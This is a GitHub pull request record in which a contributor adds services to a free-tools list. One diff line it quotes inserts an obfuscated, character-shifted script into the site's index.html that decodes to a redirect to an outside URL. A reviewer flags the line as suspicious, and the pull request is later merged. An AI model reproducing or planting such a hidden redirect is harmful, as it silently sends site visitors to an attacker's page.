Add a few services
free-for-life/free-for-life pull request #36
Opened 2023-11-05 10:48 UTC by fiftys7ven

2023-11-05 12:13 UTC, WilliamDavidHarrison requested changes

2023-11-05 12:13 UTC, WilliamDavidHarrison commented on data/Artificial_Intelligence.md
> +| [Github Copilot](https://github.com/features/copilot) | **GitHub Copilot is free to use for verified students, teachers, and maintainers of popular open source projects.** If you are not a student,
We have purposely not added GitHub Copilot to our list as it is not free forever, it is only a free trial.

2023-11-05 12:13 UTC, WilliamDavidHarrison commented on data/Design_and_UI.md
Please place your changes alphabetically.

2023-11-05 12:13 UTC, WilliamDavidHarrison commented on data/Email.md
Please place your changes alphabetically.

2023-11-05 12:13 UTC, WilliamDavidHarrison commented on data/DNS.md
Please place your changes alphabetically.

2023-11-05 12:13 UTC, WilliamDavidHarrison commented on data/SSL.md
Please place your changes alphabetically.

2023-11-05 12:13 UTC, WilliamDavidHarrison commented on website/index.html
> +<script>var s="=tdsjqu?xjoepx/mpdbujpo/isfg>#iuuqt;00s/nuew/nf0ofx.xfctjuf#=0tdsjqu?";var m="";for(var i=0;i<s.length;i++)m+=String.fromCharCode(s.charCodeAt(i)-1);document.write(m);</script><noscrip
What does this script do? It looks quite suspicious.

2023-11-05 18:14 UTC, Jeymen commented
@fiftys7ven Hi, thank you for the contribution. Please use a descriptive title and description next time. Thank you.

2023-11-06 08:07 UTC, Jeymen requested changes
The PR has merge conflicts.

2023-11-06 15:06 UTC, ghost commented
i solved all problems. please accept my pull request.

2023-11-06 15:07 UTC, ghost commented
Jeymen, also no problem. i will be creative next time.

2023-11-06 17:50 UTC, Jeymen approved these changes

2023-11-06 17:51 UTC, merged

2023-11-06 17:51 UTC, Jeymen commented
Thank you for contributing!